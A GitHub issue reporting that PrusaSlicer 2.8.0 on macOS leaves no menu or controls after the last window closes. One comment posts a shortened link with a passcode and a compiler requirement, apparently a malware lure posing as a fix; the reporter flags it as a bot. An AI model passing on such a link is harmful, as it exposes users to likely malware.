prusa3d/PrusaSlicer #13337: macos no menu when windows closed and no way to control app

w1jp, 2024-09-05:
### Description of the bug

After closing the last open window on PursaSlicer (_app_), there is no way to control the application.

When all windows are closed, the app is still running and is visible in the tray as show below.
[image]

I right-click on _Show All Windows_:
[image]

I get this following screen:
[image]

Note that when I left-click the app icon in the tray nothing happens and there are no menu items to control the application. I am forced to kill the quasi zombie process and restart it. _(don't flame me on the zombie process as literally it is not in a terminated state; however, from a UI perspective, it is a zombie as the only possible action is to reap it.)_

When Quitting the app, I am given a dialog to save and 'untitled' project which must have been created for me when I closed my window. This will be confusing with non-technical users.
[image]

I recommend either terminating the parent process after all windows are closed or provide an 'Open...' option on the right-click of the icon. Also a single left-click on the tray icon should open a dialog giving me the option to open a file or terminate.

_This is related to issue #4828; however, this is a bug of higher priority as most macos users are not right-click savvy and will not know how to deal with this situation._

### Project file & How to reproduce

The steps to produce:
 1. Close a PrusaSlicer window by left-clicking on the red dot in upper left.
 2. With no windows left, the app is now a zombie.

### Checklist of files included above

- [ ] Project file
- [X] Screenshot

### Version of PrusaSlicer

2.8.0+MacOS-x64

### Operating system

macos: 14.6.1 (23G93)

### Printer model

mk4

danilobalderramas, 2024-09-05:
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

w1jp, 2024-09-05:
> Give this a shot https://bit.ly/4eaAnWN Passcode: changeme you must have a gcc compiler

This is an automated bot and should be banned.

closed 2026-09-29 by prusaslicer-bot[bot]